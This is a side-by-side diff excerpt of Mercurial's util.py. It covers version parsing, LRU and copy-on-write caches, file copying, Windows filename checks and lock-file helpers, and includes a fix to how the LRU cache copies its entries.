954 954 return
955 955
956 956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 957 self.name, level, optname, value, res))
958 958
959 959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 960 logdata=False, logdataapis=True):
961 961 """Turn a socket into a logging socket."""
962 962
963 963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 964 states=states, logdata=logdata,
965 965 logdataapis=logdataapis)
966 966 return socketproxy(fh, observer)
967 967
968 968 def version():
969 969 """Return version information if available."""
970 970 try:
971 971 from . import __version__
972 972 return __version__.version
973 973 except ImportError:
974 974 return 'unknown'
975 975
976 976 def versiontuple(v=None, n=4):
977 977 """Parses a Mercurial version string into an N-tuple.
978 978
979 979 The version string to be parsed is specified with the ``v`` argument.
980 980 If it isn't defined, the current Mercurial version string will be parsed.
981 981
982 982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 983 returned values:
984 984
985 985 >>> v = b'3.6.1+190-df9b73d2d444'
986 986 >>> versiontuple(v, 2)
987 987 (3, 6)
988 988 >>> versiontuple(v, 3)
989 989 (3, 6, 1)
990 990 >>> versiontuple(v, 4)
991 991 (3, 6, 1, '190-df9b73d2d444')
992 992
993 993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 994 (3, 6, 1, '190-df9b73d2d444+20151118')
995 995
996 996 >>> v = b'3.6'
997 997 >>> versiontuple(v, 2)
998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, None)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, None, None)
1003 1003
1004 1004 >>> v = b'3.9-rc'
1005 1005 >>> versiontuple(v, 2)
1006 1006 (3, 9)
1007 1007 >>> versiontuple(v, 3)
1008 1008 (3, 9, None)
1009 1009 >>> versiontuple(v, 4)
1010 1010 (3, 9, None, 'rc')
1011 1011
1012 1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 1013 >>> versiontuple(v, 2)
1014 1014 (3, 9)
1015 1015 >>> versiontuple(v, 3)
1016 1016 (3, 9, None)
1017 1017 >>> versiontuple(v, 4)
1018 1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019 1019
1020 1020 >>> versiontuple(b'4.6rc0')
1021 1021 (4, 6, None, 'rc0')
1022 1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 1024 >>> versiontuple(b'.1.2.3')
1025 1025 (None, None, None, '.1.2.3')
1026 1026 >>> versiontuple(b'12.34..5')
1027 1027 (12, 34, None, '..5')
1028 1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 1029 (1, 2, 3, '.4.5.6')
1030 1030 """
1031 1031 if not v:
1032 1032 v = version()
1033 1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 1034 if not m:
1035 1035 vparts, extra = '', v
1036 1036 elif m.group(2):
1037 1037 vparts, extra = m.groups()
1038 1038 else:
1039 1039 vparts, extra = m.group(1), None
1040 1040
1041 1041 vints = []
1042 1042 for i in vparts.split('.'):
1043 1043 try:
1044 1044 vints.append(int(i))
1045 1045 except ValueError:
1046 1046 break
1047 1047 # (3, 6) -> (3, 6, None)
1048 1048 while len(vints) < 3:
1049 1049 vints.append(None)
1050 1050
1051 1051 if n == 2:
1052 1052 return (vints[0], vints[1])
1053 1053 if n == 3:
1054 1054 return (vints[0], vints[1], vints[2])
1055 1055 if n == 4:
1056 1056 return (vints[0], vints[1], vints[2], extra)
1057 1057
1058 1058 def cachefunc(func):
1059 1059 '''cache the result of function calls'''
1060 1060 # XXX doesn't handle keyword args
1061 1061 if func.__code__.co_argcount == 0:
1062 1062 cache = []
1063 1063 def f():
1064 1064 if len(cache) == 0:
1065 1065 cache.append(func())
1066 1066 return cache[0]
1067 1067 return f
1068 1068 cache = {}
1069 1069 if func.__code__.co_argcount == 1:
1070 1070 # we gain a small amount of time because
1071 1071 # we don't need to pack/unpack the list
1072 1072 def f(arg):
1073 1073 if arg not in cache:
1074 1074 cache[arg] = func(arg)
1075 1075 return cache[arg]
1076 1076 else:
1077 1077 def f(*args):
1078 1078 if args not in cache:
1079 1079 cache[args] = func(*args)
1080 1080 return cache[args]
1081 1081
1082 1082 return f
1083 1083
1084 1084 class cow(object):
1085 1085 """helper class to make copy-on-write easier
1086 1086
1087 1087 Call preparewrite before doing any writes.
1088 1088 """
1089 1089
1090 1090 def preparewrite(self):
1091 1091 """call this before writes, return self or a copied new object"""
1092 1092 if getattr(self, '_copied', 0):
1093 1093 self._copied -= 1
1094 1094 return self.__class__(self)
1095 1095 return self
1096 1096
1097 1097 def copy(self):
1098 1098 """always do a cheap copy"""
1099 1099 self._copied = getattr(self, '_copied', 0) + 1
1100 1100 return self
1101 1101
1102 1102 class sortdict(collections.OrderedDict):
1103 1103 '''a simple sorted dictionary
1104 1104
1105 1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 1106 >>> d2 = d1.copy()
1107 1107 >>> d2
1108 1108 sortdict([('a', 0), ('b', 1)])
1109 1109 >>> d2.update([(b'a', 2)])
1110 1110 >>> list(d2.keys()) # should still be in last-set order
1111 1111 ['b', 'a']
1112 1112 '''
1113 1113
1114 1114 def __setitem__(self, key, value):
1115 1115 if key in self:
1116 1116 del self[key]
1117 1117 super(sortdict, self).__setitem__(key, value)
1118 1118
1119 1119 if pycompat.ispypy:
1120 1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 1121 def update(self, src):
1122 1122 if isinstance(src, dict):
1123 1123 src = src.iteritems()
1124 1124 for k, v in src:
1125 1125 self[k] = v
1126 1126
1127 1127 class cowdict(cow, dict):
1128 1128 """copy-on-write dict
1129 1129
1130 1130 Be sure to call d = d.preparewrite() before writing to d.
1131 1131
1132 1132 >>> a = cowdict()
1133 1133 >>> a is a.preparewrite()
1134 1134 True
1135 1135 >>> b = a.copy()
1136 1136 >>> b is a
1137 1137 True
1138 1138 >>> c = b.copy()
1139 1139 >>> c is a
1140 1140 True
1141 1141 >>> a = a.preparewrite()
1142 1142 >>> b is a
1143 1143 False
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> c = c.preparewrite()
1147 1147 >>> b is c
1148 1148 False
1149 1149 >>> b is b.preparewrite()
1150 1150 True
1151 1151 """
1152 1152
1153 1153 class cowsortdict(cow, sortdict):
1154 1154 """copy-on-write sortdict
1155 1155
1156 1156 Be sure to call d = d.preparewrite() before writing to d.
1157 1157 """
1158 1158
1159 1159 class transactional(object):
1160 1160 """Base class for making a transactional type into a context manager."""
1161 1161 __metaclass__ = abc.ABCMeta
1162 1162
1163 1163 @abc.abstractmethod
1164 1164 def close(self):
1165 1165 """Successfully closes the transaction."""
1166 1166
1167 1167 @abc.abstractmethod
1168 1168 def release(self):
1169 1169 """Marks the end of the transaction.
1170 1170
1171 1171 If the transaction has not been closed, it will be aborted.
1172 1172 """
1173 1173
1174 1174 def __enter__(self):
1175 1175 return self
1176 1176
1177 1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 1178 try:
1179 1179 if exc_type is None:
1180 1180 self.close()
1181 1181 finally:
1182 1182 self.release()
1183 1183
1184 1184 @contextlib.contextmanager
1185 1185 def acceptintervention(tr=None):
1186 1186 """A context manager that closes the transaction on InterventionRequired
1187 1187
1188 1188 If no transaction was provided, this simply runs the body and returns
1189 1189 """
1190 1190 if not tr:
1191 1191 yield
1192 1192 return
1193 1193 try:
1194 1194 yield
1195 1195 tr.close()
1196 1196 except error.InterventionRequired:
1197 1197 tr.close()
1198 1198 raise
1199 1199 finally:
1200 1200 tr.release()
1201 1201
1202 1202 @contextlib.contextmanager
1203 1203 def nullcontextmanager():
1204 1204 yield
1205 1205
1206 1206 class _lrucachenode(object):
1207 1207 """A node in a doubly linked list.
1208 1208
1209 1209 Holds a reference to nodes on either side as well as a key-value
1210 1210 pair for the dictionary entry.
1211 1211 """
1212 1212 __slots__ = (u'next', u'prev', u'key', u'value')
1213 1213
1214 1214 def __init__(self):
1215 1215 self.next = None
1216 1216 self.prev = None
1217 1217
1218 1218 self.key = _notset
1219 1219 self.value = None
1220 1220
1221 1221 def markempty(self):
1222 1222 """Mark the node as emptied."""
1223 1223 self.key = _notset
1224 1224
1225 1225 class lrucachedict(object):
1226 1226 """Dict that caches most recent accesses and sets.
1227 1227
1228 1228 The dict consists of an actual backing dict - indexed by original
1229 1229 key - and a doubly linked circular list defining the order of entries in
1230 1230 the cache.
1231 1231
1232 1232 The head node is the newest entry in the cache. If the cache is full,
1233 1233 we recycle head.prev and make it the new head. Cache accesses result in
1234 1234 the node being moved to before the existing head and being marked as the
1235 1235 new head node.
1236 1236 """
1237 1237 def __init__(self, max):
1238 1238 self._cache = {}
1239 1239
1240 1240 self._head = head = _lrucachenode()
1241 1241 head.prev = head
1242 1242 head.next = head
1243 1243 self._size = 1
1244 1244 self._capacity = max
1245 1245
1246 1246 def __len__(self):
1247 1247 return len(self._cache)
1248 1248
1249 1249 def __contains__(self, k):
1250 1250 return k in self._cache
1251 1251
1252 1252 def __iter__(self):
1253 1253 # We don't have to iterate in cache order, but why not.
1254 1254 n = self._head
1255 1255 for i in range(len(self._cache)):
1256 1256 yield n.key
1257 1257 n = n.next
1258 1258
1259 1259 def __getitem__(self, k):
1260 1260 node = self._cache[k]
1261 1261 self._movetohead(node)
1262 1262 return node.value
1263 1263
1264 1264 def __setitem__(self, k, v):
1265 1265 node = self._cache.get(k)
1266 1266 # Replace existing value and mark as newest.
1267 1267 if node is not None:
1268 1268 node.value = v
1269 1269 self._movetohead(node)
1270 1270 return
1271 1271
1272 1272 if self._size < self._capacity:
1273 1273 node = self._addcapacity()
1274 1274 else:
1275 1275 # Grab the last/oldest item.
1276 1276 node = self._head.prev
1277 1277
1278 1278 # At capacity. Kill the old entry.
1279 1279 if node.key is not _notset:
1280 1280 del self._cache[node.key]
1281 1281
1282 1282 node.key = k
1283 1283 node.value = v
1284 1284 self._cache[k] = node
1285 1285 # And mark it as newest entry. No need to adjust order since it
1286 1286 # is already self._head.prev.
1287 1287 self._head = node
1288 1288
1289 1289 def __delitem__(self, k):
1290 1290 node = self._cache.pop(k)
1291 1291 node.markempty()
1292 1292
1293 1293 # Temporarily mark as newest item before re-adjusting head to make
1294 1294 # this node the oldest item.
1295 1295 self._movetohead(node)
1296 1296 self._head = node.next
1297 1297
1298 1298 # Additional dict methods.
1299 1299
1300 1300 def get(self, k, default=None):
1301 1301 try:
1302 1302 return self._cache[k].value
1303 1303 except KeyError:
1304 1304 return default
1305 1305
1306 1306 def clear(self):
1307 1307 n = self._head
1308 1308 while n.key is not _notset:
1309 1309 n.markempty()
1310 1310 n = n.next
1311 1311
1312 1312 self._cache.clear()
1313 1313
1314 1314 def copy(self):
1315 1315 result = lrucachedict(self._capacity)
1316
1317 # We copy entries by iterating in oldest-to-newest order so the copy
1318 # has the correct ordering.
1319
1320 # Find the first non-empty entry.
1316 1321 n = self._head.prev
1317 # Iterate in oldest-to-newest order, so the copy has the right ordering
1322 while n.key is _notset and n is not self._head:
1323 n = n.prev
1324
1318 1325 for i in range(len(self._cache)):
1319 1326 result[n.key] = n.value
1320 1327 n = n.prev
1328
1321 1329 return result
1322 1330
1323 1331 def _movetohead(self, node):
1324 1332 """Mark a node as the newest, making it the new head.
1325 1333
1326 1334 When a node is accessed, it becomes the freshest entry in the LRU
1327 1335 list, which is denoted by self._head.
1328 1336
1329 1337 Visually, let's make ``N`` the new head node (* denotes head):
1330 1338
1331 1339 previous/oldest <-> head <-> next/next newest
1332 1340
1333 1341 ----<->--- A* ---<->-----
1334 1342 | |
1335 1343 E <-> D <-> N <-> C <-> B
1336 1344
1337 1345 To:
1338 1346
1339 1347 ----<->--- N* ---<->-----
1340 1348 | |
1341 1349 E <-> D <-> C <-> B <-> A
1342 1350
1343 1351 This requires the following moves:
1344 1352
1345 1353 C.next = D (node.prev.next = node.next)
1346 1354 D.prev = C (node.next.prev = node.prev)
1347 1355 E.next = N (head.prev.next = node)
1348 1356 N.prev = E (node.prev = head.prev)
1349 1357 N.next = A (node.next = head)
1350 1358 A.prev = N (head.prev = node)
1351 1359 """
1352 1360 head = self._head
1353 1361 # C.next = D
1354 1362 node.prev.next = node.next
1355 1363 # D.prev = C
1356 1364 node.next.prev = node.prev
1357 1365 # N.prev = E
1358 1366 node.prev = head.prev
1359 1367 # N.next = A
1360 1368 # It is tempting to do just "head" here; however, if node is
1361 1369 # adjacent to head, this will do bad things.
1362 1370 node.next = head.prev.next
1363 1371 # E.next = N
1364 1372 node.next.prev = node
1365 1373 # A.prev = N
1366 1374 node.prev.next = node
1367 1375
1368 1376 self._head = node
1369 1377
1370 1378 def _addcapacity(self):
1371 1379 """Add a node to the circular linked list.
1372 1380
1373 1381 The new node is inserted before the head node.
1374 1382 """
1375 1383 head = self._head
1376 1384 node = _lrucachenode()
1377 1385 head.prev.next = node
1378 1386 node.prev = head.prev
1379 1387 node.next = head
1380 1388 head.prev = node
1381 1389 self._size += 1
1382 1390 return node
1383 1391
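# [Editorial sketch, not part of util.py] LRU behavior of lrucachedict, and
# the copy ordering guaranteed by this changeset (hypothetical values):
d = lrucachedict(2)
d['a'] = 1
d['b'] = 2
d['a']                             # access marks 'a' most recently used
d['c'] = 3                         # evicts 'b', the least recently used
assert 'b' not in d and 'a' in d and 'c' in d
assert list(d.copy()) == list(d)   # copy preserves recency order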
1384 1392 def lrucachefunc(func):
1385 1393 '''cache most recent results of function calls'''
1386 1394 cache = {}
1387 1395 order = collections.deque()
1388 1396 if func.__code__.co_argcount == 1:
1389 1397 def f(arg):
1390 1398 if arg not in cache:
1391 1399 if len(cache) > 20:
1392 1400 del cache[order.popleft()]
1393 1401 cache[arg] = func(arg)
1394 1402 else:
1395 1403 order.remove(arg)
1396 1404 order.append(arg)
1397 1405 return cache[arg]
1398 1406 else:
1399 1407 def f(*args):
1400 1408 if args not in cache:
1401 1409 if len(cache) > 20:
1402 1410 del cache[order.popleft()]
1403 1411 cache[args] = func(*args)
1404 1412 else:
1405 1413 order.remove(args)
1406 1414 order.append(args)
1407 1415 return cache[args]
1408 1416
1409 1417 return f
1410 1418
1411 1419 class propertycache(object):
1412 1420 def __init__(self, func):
1413 1421 self.func = func
1414 1422 self.name = func.__name__
1415 1423 def __get__(self, obj, type=None):
1416 1424 result = self.func(obj)
1417 1425 self.cachevalue(obj, result)
1418 1426 return result
1419 1427
1420 1428 def cachevalue(self, obj, value):
1421 1429 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1422 1430 obj.__dict__[self.name] = value
1423 1431
1424 1432 def clearcachedproperty(obj, prop):
1425 1433 '''clear a cached property value, if one has been set'''
1426 1434 if prop in obj.__dict__:
1427 1435 del obj.__dict__[prop]
1428 1436
1429 1437 def increasingchunks(source, min=1024, max=65536):
1430 1438 '''return no less than min bytes per chunk while data remains,
1431 1439 doubling min after each chunk until it reaches max'''
1432 1440 def log2(x):
1433 1441 if not x:
1434 1442 return 0
1435 1443 i = 0
1436 1444 while x:
1437 1445 x >>= 1
1438 1446 i += 1
1439 1447 return i - 1
1440 1448
1441 1449 buf = []
1442 1450 blen = 0
1443 1451 for chunk in source:
1444 1452 buf.append(chunk)
1445 1453 blen += len(chunk)
1446 1454 if blen >= min:
1447 1455 if min < max:
1448 1456 min = min << 1
1449 1457 nmin = 1 << log2(blen)
1450 1458 if nmin > min:
1451 1459 min = nmin
1452 1460 if min > max:
1453 1461 min = max
1454 1462 yield ''.join(buf)
1455 1463 blen = 0
1456 1464 buf = []
1457 1465 if buf:
1458 1466 yield ''.join(buf)
1459 1467
1460 1468 def always(fn):
1461 1469 return True
1462 1470
1463 1471 def never(fn):
1464 1472 return False
1465 1473
1466 1474 def nogc(func):
1467 1475 """disable garbage collector
1468 1476
1469 1477 Python's garbage collector triggers a GC each time a certain number of
1470 1478 container objects (the number being defined by gc.get_threshold()) are
1471 1479 allocated even when marked not to be tracked by the collector. Tracking has
1472 1480 no effect on when GCs are triggered, only on what objects the GC looks
1473 1481 into. As a workaround, disable GC while building complex (huge)
1474 1482 containers.
1475 1483
1476 1484 This garbage collector issue has been fixed in 2.7, but it still affects
1477 1485 CPython's performance.
1478 1486 """
1479 1487 def wrapper(*args, **kwargs):
1480 1488 gcenabled = gc.isenabled()
1481 1489 gc.disable()
1482 1490 try:
1483 1491 return func(*args, **kwargs)
1484 1492 finally:
1485 1493 if gcenabled:
1486 1494 gc.enable()
1487 1495 return wrapper
1488 1496
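# [Editorial sketch, not part of util.py] Typical use of the decorator when
# building a huge container (hypothetical workload):
@nogc
def buildhugeindex(n):
    return [{i: [i]} for i in range(n)]   # many tracked containers, no GC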
1489 1497 if pycompat.ispypy:
1490 1498 # PyPy runs slower with gc disabled
1491 1499 nogc = lambda x: x
1492 1500
1493 1501 def pathto(root, n1, n2):
1494 1502 '''return the relative path from one place to another.
1495 1503 root should use os.sep to separate directories
1496 1504 n1 should use os.sep to separate directories
1497 1505 n2 should use "/" to separate directories
1498 1506 returns an os.sep-separated path.
1499 1507
1500 1508 If n1 is a relative path, it's assumed it's
1501 1509 relative to root.
1502 1510 n2 should always be relative to root.
1503 1511 '''
1504 1512 if not n1:
1505 1513 return localpath(n2)
1506 1514 if os.path.isabs(n1):
1507 1515 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1508 1516 return os.path.join(root, localpath(n2))
1509 1517 n2 = '/'.join((pconvert(root), n2))
1510 1518 a, b = splitpath(n1), n2.split('/')
1511 1519 a.reverse()
1512 1520 b.reverse()
1513 1521 while a and b and a[-1] == b[-1]:
1514 1522 a.pop()
1515 1523 b.pop()
1516 1524 b.reverse()
1517 1525 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1518 1526
1519 1527 # the location of data files matching the source code
1520 1528 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1521 1529 # executable version (py2exe) doesn't support __file__
1522 1530 datapath = os.path.dirname(pycompat.sysexecutable)
1523 1531 else:
1524 1532 datapath = os.path.dirname(pycompat.fsencode(__file__))
1525 1533
1526 1534 i18n.setdatapath(datapath)
1527 1535
1528 1536 def checksignature(func):
1529 1537 '''wrap a function with code to check for calling errors'''
1530 1538 def check(*args, **kwargs):
1531 1539 try:
1532 1540 return func(*args, **kwargs)
1533 1541 except TypeError:
1534 1542 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1535 1543 raise error.SignatureError
1536 1544 raise
1537 1545
1538 1546 return check
1539 1547
1540 1548 # a whitelist of known filesystems where hardlinks work reliably
1541 1549 _hardlinkfswhitelist = {
1542 1550 'apfs',
1543 1551 'btrfs',
1544 1552 'ext2',
1545 1553 'ext3',
1546 1554 'ext4',
1547 1555 'hfs',
1548 1556 'jfs',
1549 1557 'NTFS',
1550 1558 'reiserfs',
1551 1559 'tmpfs',
1552 1560 'ufs',
1553 1561 'xfs',
1554 1562 'zfs',
1555 1563 }
1556 1564
1557 1565 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1558 1566 '''copy a file, preserving mode and optionally other stat info like
1559 1567 atime/mtime
1560 1568
1561 1569 checkambig argument is used with filestat, and is useful only if
1562 1570 destination file is guarded by any lock (e.g. repo.lock or
1563 1571 repo.wlock).
1564 1572
1565 1573 copystat and checkambig should be exclusive.
1566 1574 '''
1567 1575 assert not (copystat and checkambig)
1568 1576 oldstat = None
1569 1577 if os.path.lexists(dest):
1570 1578 if checkambig:
1571 1579 oldstat = checkambig and filestat.frompath(dest)
1572 1580 unlink(dest)
1573 1581 if hardlink:
1574 1582 # Hardlinks are problematic on CIFS (issue4546); do not allow hardlinks
1575 1583 # unless we are confident that dest is on a whitelisted filesystem.
1576 1584 try:
1577 1585 fstype = getfstype(os.path.dirname(dest))
1578 1586 except OSError:
1579 1587 fstype = None
1580 1588 if fstype not in _hardlinkfswhitelist:
1581 1589 hardlink = False
1582 1590 if hardlink:
1583 1591 try:
1584 1592 oslink(src, dest)
1585 1593 return
1586 1594 except (IOError, OSError):
1587 1595 pass # fall back to normal copy
1588 1596 if os.path.islink(src):
1589 1597 os.symlink(os.readlink(src), dest)
1590 1598 # copytime is ignored for symlinks, but in general copytime isn't needed
1591 1599 # for them anyway
1592 1600 else:
1593 1601 try:
1594 1602 shutil.copyfile(src, dest)
1595 1603 if copystat:
1596 1604 # copystat also copies mode
1597 1605 shutil.copystat(src, dest)
1598 1606 else:
1599 1607 shutil.copymode(src, dest)
1600 1608 if oldstat and oldstat.stat:
1601 1609 newstat = filestat.frompath(dest)
1602 1610 if newstat.isambig(oldstat):
1603 1611 # stat of the copied file is ambiguous with the original one
1604 1612 advanced = (
1605 1613 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1606 1614 os.utime(dest, (advanced, advanced))
1607 1615 except shutil.Error as inst:
1608 1616 raise error.Abort(str(inst))
1609 1617
1610 1618 def copyfiles(src, dst, hardlink=None, progress=None):
1611 1619 """Copy a directory tree using hardlinks if possible."""
1612 1620 num = 0
1613 1621
1614 1622 def settopic():
1615 1623 if progress:
1616 1624 progress.topic = _('linking') if hardlink else _('copying')
1617 1625
1618 1626 if os.path.isdir(src):
1619 1627 if hardlink is None:
1620 1628 hardlink = (os.stat(src).st_dev ==
1621 1629 os.stat(os.path.dirname(dst)).st_dev)
1622 1630 settopic()
1623 1631 os.mkdir(dst)
1624 1632 for name, kind in listdir(src):
1625 1633 srcname = os.path.join(src, name)
1626 1634 dstname = os.path.join(dst, name)
1627 1635 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1628 1636 num += n
1629 1637 else:
1630 1638 if hardlink is None:
1631 1639 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1632 1640 os.stat(os.path.dirname(dst)).st_dev)
1633 1641 settopic()
1634 1642
1635 1643 if hardlink:
1636 1644 try:
1637 1645 oslink(src, dst)
1638 1646 except (IOError, OSError):
1639 1647 hardlink = False
1640 1648 shutil.copy(src, dst)
1641 1649 else:
1642 1650 shutil.copy(src, dst)
1643 1651 num += 1
1644 1652 if progress:
1645 1653 progress.increment()
1646 1654
1647 1655 return hardlink, num
1648 1656
1649 1657 _winreservednames = {
1650 1658 'con', 'prn', 'aux', 'nul',
1651 1659 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1652 1660 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1653 1661 }
1654 1662 _winreservedchars = ':*?"<>|'
1655 1663 def checkwinfilename(path):
1656 1664 r'''Check that the base-relative path is a valid filename on Windows.
1657 1665 Returns None if the path is ok, or a UI string describing the problem.
1658 1666
1659 1667 >>> checkwinfilename(b"just/a/normal/path")
1660 1668 >>> checkwinfilename(b"foo/bar/con.xml")
1661 1669 "filename contains 'con', which is reserved on Windows"
1662 1670 >>> checkwinfilename(b"foo/con.xml/bar")
1663 1671 "filename contains 'con', which is reserved on Windows"
1664 1672 >>> checkwinfilename(b"foo/bar/xml.con")
1665 1673 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1666 1674 "filename contains 'AUX', which is reserved on Windows"
1667 1675 >>> checkwinfilename(b"foo/bar/bla:.txt")
1668 1676 "filename contains ':', which is reserved on Windows"
1669 1677 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1670 1678 "filename contains '\\x07', which is invalid on Windows"
1671 1679 >>> checkwinfilename(b"foo/bar/bla ")
1672 1680 "filename ends with ' ', which is not allowed on Windows"
1673 1681 >>> checkwinfilename(b"../bar")
1674 1682 >>> checkwinfilename(b"foo\\")
1675 1683 "filename ends with '\\', which is invalid on Windows"
1676 1684 >>> checkwinfilename(b"foo\\/bar")
1677 1685 "directory name ends with '\\', which is invalid on Windows"
1678 1686 '''
1679 1687 if path.endswith('\\'):
1680 1688 return _("filename ends with '\\', which is invalid on Windows")
1681 1689 if '\\/' in path:
1682 1690 return _("directory name ends with '\\', which is invalid on Windows")
1683 1691 for n in path.replace('\\', '/').split('/'):
1684 1692 if not n:
1685 1693 continue
1686 1694 for c in _filenamebytestr(n):
1687 1695 if c in _winreservedchars:
1688 1696 return _("filename contains '%s', which is reserved "
1689 1697 "on Windows") % c
1690 1698 if ord(c) <= 31:
1691 1699 return _("filename contains '%s', which is invalid "
1692 1700 "on Windows") % stringutil.escapestr(c)
1693 1701 base = n.split('.')[0]
1694 1702 if base and base.lower() in _winreservednames:
1695 1703 return _("filename contains '%s', which is reserved "
1696 1704 "on Windows") % base
1697 1705 t = n[-1:]
1698 1706 if t in '. ' and n not in '..':
1699 1707 return _("filename ends with '%s', which is not allowed "
1700 1708 "on Windows") % t
1701 1709
1702 1710 if pycompat.iswindows:
1703 1711 checkosfilename = checkwinfilename
1704 1712 timer = time.clock
1705 1713 else:
1706 1714 checkosfilename = platform.checkosfilename
1707 1715 timer = time.time
1708 1716
1709 1717 if safehasattr(time, "perf_counter"):
1710 1718 timer = time.perf_counter
1711 1719
1712 1720 def makelock(info, pathname):
1713 1721 """Create a lock file atomically if possible
1714 1722
1715 1723 This may leave a stale lock file if symlink isn't supported and signal
1716 1724 interrupt is enabled.
1717 1725 """
1718 1726 try:
1719 1727 return os.symlink(info, pathname)
1720 1728 except OSError as why:
1721 1729 if why.errno == errno.EEXIST:
1722 1730 raise
1723 1731 except AttributeError: # no symlink in os
1724 1732 pass
1725 1733
1726 1734 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1727 1735 ld = os.open(pathname, flags)
1728 1736 os.write(ld, info)
1729 1737 os.close(ld)
1730 1738
1731 1739 def readlock(pathname):
1732 1740 try:
1733 1741 return os.readlink(pathname)
1734 1742 except OSError as why:
1735 1743 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1736 1744 raise
1737 1745 except AttributeError: # no symlink in os
1738 1746 pass
1739 1747 fp = posixfile(pathname, 'rb')
1740 1748 r = fp.read()
1741 1749 fp.close()
1742 1750 return r
1743 1751
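# Illustrative sketch (not called anywhere): the round trip between
# makelock() and readlock(). On platforms with symlinks the lock content
# is the symlink target; otherwise readlock() falls back to reading the
# regular file created by makelock(). The values below are hypothetical.
def _lockroundtripexample():
    makelock(b'hostname:12345', b'.hg/wlock')
    return readlock(b'.hg/wlock')  # -> b'hostname:12345'
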
1744 1752 def fstat(fp):
1745 1753 '''stat file object that may not have fileno method.'''
1746 1754 try:
1747 1755 return os.fstat(fp.fileno())
1748 1756 except AttributeError:
1749 1757 return os.stat(fp.name)
1750 1758
1751 1759 # File system features
1752 1760
1753 1761 def fscasesensitive(path):
1754 1762 """
1755 1763 Return true if the given path is on a case-sensitive filesystem
1756 1764
1757 1765 Requires a path (like /foo/.hg) ending with a foldable final
1758 1766 directory component.
1759 1767 """
1760 1768 s1 = os.lstat(path)
1761 1769 d, b = os.path.split(path)
1762 1770 b2 = b.upper()
1763 1771 if b == b2:
1764 1772 b2 = b.lower()
1765 1773 if b == b2:
1766 1774 return True # no evidence against case sensitivity
1767 1775 p2 = os.path.join(d, b2)
1768 1776 try:
1769 1777 s2 = os.lstat(p2)
1770 1778 if s2 == s1:
1771 1779 return False
1772 1780 return True
1773 1781 except OSError:
1774 1782 return True
1775 1783
1776 1784 try:
1777 1785 import re2
1778 1786 _re2 = None
1779 1787 except ImportError:
1780 1788 _re2 = False
1781 1789
1782 1790 class _re(object):
1783 1791 def _checkre2(self):
1784 1792 global _re2
1785 1793 try:
1786 1794 # check if match works, see issue3964
1787 1795 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1788 1796 except ImportError:
1789 1797 _re2 = False
1790 1798
1791 1799 def compile(self, pat, flags=0):
1792 1800 '''Compile a regular expression, using re2 if possible
1793 1801
1794 1802 For best performance, use only re2-compatible regexp features. The
1795 1803 only flags from the re module that are re2-compatible are
1796 1804 IGNORECASE and MULTILINE.'''
1797 1805 if _re2 is None:
1798 1806 self._checkre2()
1799 1807 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1800 1808 if flags & remod.IGNORECASE:
1801 1809 pat = '(?i)' + pat
1802 1810 if flags & remod.MULTILINE:
1803 1811 pat = '(?m)' + pat
1804 1812 try:
1805 1813 return re2.compile(pat)
1806 1814 except re2.error:
1807 1815 pass
1808 1816 return remod.compile(pat, flags)
1809 1817
1810 1818 @propertycache
1811 1819 def escape(self):
1812 1820 '''Return the version of escape corresponding to self.compile.
1813 1821
1814 1822 This is imperfect because whether re2 or re is used for a particular
1815 1823 function depends on the flags, etc, but it's the best we can do.
1816 1824 '''
1817 1825 global _re2
1818 1826 if _re2 is None:
1819 1827 self._checkre2()
1820 1828 if _re2:
1821 1829 return re2.escape
1822 1830 else:
1823 1831 return remod.escape
1824 1832
1825 1833 re = _re()
1826 1834
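# Illustrative sketch (not called anywhere): the module-level ``re``
# singleton is used like the stdlib module; re2 is selected transparently
# when it is importable and the flags are re2-compatible.
def _recompileexample():
    pat = re.compile(br'^[0-9a-f]{40}$', remod.IGNORECASE)
    return bool(pat.match(b'A' * 40))
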
1827 1835 _fspathcache = {}
1828 1836 def fspath(name, root):
1829 1837 '''Get name in the case stored in the filesystem
1830 1838
1831 1839 The name should be relative to root, and be normcase-ed for efficiency.
1832 1840
1833 1841 Note that this function is unnecessary, and should not be
1834 1842 called, for case-sensitive filesystems (simply because it's expensive).
1835 1843
1836 1844 The root should be normcase-ed, too.
1837 1845 '''
1838 1846 def _makefspathcacheentry(dir):
1839 1847 return dict((normcase(n), n) for n in os.listdir(dir))
1840 1848
1841 1849 seps = pycompat.ossep
1842 1850 if pycompat.osaltsep:
1843 1851 seps = seps + pycompat.osaltsep
1844 1852 # Protect backslashes. This gets silly very quickly.
